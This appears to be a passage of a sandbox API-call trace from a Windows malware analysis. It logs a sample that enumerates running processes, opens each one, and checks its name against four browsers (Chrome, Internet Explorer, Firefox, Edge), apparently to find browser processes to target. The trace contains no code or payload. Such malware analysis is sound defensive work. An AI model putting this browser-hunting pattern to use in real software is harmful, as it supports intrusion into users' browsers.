	[0199.894] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0199.895] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1a44
	[0199.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.896] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0199.896] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.896] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.897] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0199.897] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.897] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.897] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0199.898] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x1a48
	[0199.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.898] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0199.898] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.898] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.899] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0199.899] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.899] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.900] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0199.900] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1a4c
	[0199.900] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.900] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0199.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.901] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.901] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0199.901] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.901] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.902] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0199.902] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1a50
	[0199.902] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.902] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0199.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.903] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.903] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0199.903] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.903] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.904] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0199.904] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1a54
	[0199.904] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.904] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0199.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.905] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.905] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0199.905] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.905] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.905] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0199.906] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x1a58
	[0199.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.906] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0199.906] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.906] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.907] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0199.907] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.907] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.907] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.908] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1a5c
	[0199.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.908] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.908] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.908] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.909] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.909] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.909] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.909] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.910] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1a60
	[0199.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.910] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.910] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.910] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.910] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.911] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.911] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.911] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.912] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1a64
	[0199.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.912] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.912] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.912] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.912] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.913] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.913] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.913] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.914] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x1a68
	[0199.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.914] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.914] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.914] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.915] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.915] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.915] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.915] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.916] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1a6c
	[0199.916] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.916] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.917] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.917] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.917] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.918] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.918] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.918] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.919] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1a70
	[0199.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.919] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.919] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.919] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.920] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.920] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.921] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1a74
	[0199.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.921] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.921] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.921] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.922] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.922] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0199.922] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x1a78
	[0199.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.923] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0199.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.923] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.923] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0199.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.924] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.924] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.924] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1a7c
	[0199.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.925] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.925] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.925] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.926] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.926] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0199.926] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1a80
	[0199.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.927] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.927] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.927] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.927] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.928] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0199.928] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1a84
	[0199.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.928] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0199.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.929] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.929] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0199.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.929] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.930] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x1a88
	[0199.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.931] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.931] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.931] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.931] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.932] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0199.932] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1a8c
	[0199.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.932] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0199.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.933] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.933] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0199.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.933] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.934] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0199.934] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1a90
	[0199.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.935] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0199.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.935] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.935] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0199.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.935] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.936] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0199.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1a94
	[0199.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.936] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0199.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.937] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.937] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0199.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.937] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.937] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0199.938] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x1a98
	[0199.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.938] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0199.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.939] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.939] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0199.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.939] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.939] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0199.940] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0199.940] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0199.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1a9c
	[0199.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.941] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0199.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.941] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.942] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0199.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.943] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.943] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0199.944] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1aa0
	[0199.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.944] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0199.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.944] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.944] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0199.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.945] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.945] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0199.945] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1aa4
	[0199.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.946] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
